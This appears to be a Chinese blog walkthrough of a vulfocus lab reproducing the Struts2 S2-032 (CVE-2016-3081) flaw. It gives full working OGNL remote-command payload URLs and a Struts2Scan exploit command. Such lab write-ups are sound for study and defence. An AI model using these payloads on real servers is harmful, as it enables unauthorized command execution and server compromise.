struts2-cve_2016_3081

最新推荐文章于 2024-09-24 16:23:16 发布
最新推荐文章于 2024-09-24 16:23:16 发布
阅读量304 收藏 1
点赞数
文章标签: struts servlet java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_57567689/article/details/127481318
版权

名称:struts2-cve_2016_3081

步骤1

搭建好靶场,进行访问

步骤2

添加后缀进行访问

http://123.58.224.8:12567/struts2-showcase/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

http://123.58.224.8:24355/struts2-showcase/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=\\A&ppp=%20&encoding=UTF-8&cmd=whoami

http://123.58.224.8:24355/struts2-showcase/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=\\A&ppp=%20&encoding=UTF-8&cmd=ls /tmp

步骤1

下载并解压POC,并提权

unzip Struts2-Scan-master.zip

chmod 777  Struts2-Scan-master  -R
python3 Struts2Scan.py -u http://123.58.224.8:41773/

python3 Struts2Scan.py -u http://123.58.224.8:41773/ -n  S2-032 -e

凯凯_0523
关注
vulfocus-struts2 命令执行 (CVE-2016-3081
Fanny0602的博客
06-16 2104
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
S2-032 远程代码执行漏洞(CVE-2016-3081
EC_Carrot的博客
08-11 487
漏洞简介 影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md 漏洞复现 直接请求如下URL,即可执行id命令: http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlCo
CVE-2016-3081
龙卷风摧毁停车场
02-27 596
Struts是Apache基金会的一个开源项目,Struts通过采用Java Servlet/JSP技术,实现了基于Java EE Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。目前,Struts框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用,是应用最广泛的Web应用框架之一。Apache Struts 2中存在安全漏洞。
struts2 命令执行 (CVE-2016-3081
qq_23003811的博客
07-16 326
Struts 2.3.20 - 2.3.28( 2.3.20.3和2.3.24.3除外)当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式。如果返回1001060253718代表代码可执行。通过修改whoami达到任意命令执行。
S2-032远程执行代码漏洞(CVE-2016-3081
m0_65150886的博客
01-09 667
国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;Apache Struts 2是世界上最流行的Java Web服务器框架之一。1.访问http://ip:port,出现如下页面,开始实验。
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
Struts2是一个非常流行的Java MVC框架,用于构建企业级Web应用程序。然而,它在历史上曾出现过多个安全漏洞,其中最著名的就是“Struts2漏洞”。这个标题和描述提到的"struts2-scan"是一种工具,专门用来检测Struts2...
vulfocus复现:struts2-cve_2017_5638
m0_71518346的博客
12-17 566
Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、...
【Vulfocus】struts2-cve_2017_9791漏洞复现
最新发布
JavaLord123的博客
09-24 775
本文详细描述了Vulfocus中Struts2 S2-048 远程命令执行漏洞(CVE-2017-9791)漏洞复现过程
struts2-cve_2017_5638漏洞复现
0day
02-19 1969
struts2-cve_2017_5638漏洞 漏洞概述 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakar.
struts2 cve-2016-3081 BUG版本升级整理
05-06
cve-2016-3081 BUG版本升级整理,里面有Struts 2.1.8 升级 Struts 2.3.28需要替换的jar包,如不是2.1.8的可以做一个简单的参考。可能每个人中引用的jar包不同,但通过参考能节省调试时间,希望对大家有帮助
Apache Struts 远程代码执行漏洞(CVE-2016-3081)复现
玄道的网安博客
03-05 2263
影响版本 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28 漏洞概述 远程用户可以向已启用动态方法调用以在目标系统上执行任意代码的目标服务器提供包含“method:”前缀的巧尽心思构建的表达式 环境搭建 下载地址 http://archive.apache.org/dist/struts/2.3.20/ 这里下载的是struts-2.3.20-apps.z...
vulfocus靶场struts2 命令执行 CVE-2016-3081
没有故事
04-23 603
后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。
Apache Struts 远程代码执行漏洞(CVE-2016-3081)
Darklord.W
10-20 1942
漏洞简介 漏洞描述 Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. 影响范围 Apach...
vulhub靶机struts2环境下的s2-032CVE-2016-3081)(远程命令执行漏洞)
m0_73248913的博客
05-13 382
当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。Struts 2.3.19至2.3.20.22.3.21至2.3.24.1和2.3.25至2.3.28。如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。1、 页面直接出现 404 或者 500 等错误。3、 页面的内容结构发生了明显的改变。4、 页面发生了重定向。
Struts2方法调用远程代码执行漏洞(CVE-2016-3081)分析
weixin_33708432的博客
03-08 724
绿盟科技 · 2016/04/26 18:070x00 漏洞简述2016年4月21日Struts2官方发布两个CVE,其中CVE-2016-3081官方评级为高。主要原因为在用户开启动态方法调用的情况下,会被攻击者实现远程代码执行攻击。从我自己搜索的情况来看,国内开启这个功能的网站不在少数,所以这个“Possible Remote Code Execution”漏洞的被打的可能性还是很高的。0x0...
Struts2 S2 – 032远程代码执行漏洞分析报告
热门推荐
煜铭2011
04-30 1万+
Struts2 S2 – 032远程代码执行漏洞分析报告 一、漏洞基本信息 CVE编号:CVE-2016-3081 漏洞名称:Struts2 S2 – 032远程代码执行 漏洞发布日期:2016.4.15 受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.22.3.42.2不受影响) 漏洞概述:Apache Struts 2...
墨者学院之Apache Struts2远程代码执行漏洞(S2-032)复现
liangzi321321的博客
09-22 935
本题的解题方向是struts2的S2-032漏洞,启用动态方法调用时,可以通过方法:前缀执行远程代码执行。 method: < name > Action 前缀去调用声明为 public 的函数,但是在低版本 的Strtus2中并不会对 name 方法值做 OGNL 计算,反而在高版本中会进行计算。 其中需要利用exp进行实现: 首先构造poc 编码前:由编码后解析成的代...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032CVE-2016-3081
qq_51577576的博客
11-25 729
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-032CVE-2016-3081) Apache Struts 2是世界上最流行的Java Web服务器框架之一。Struts 2上存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值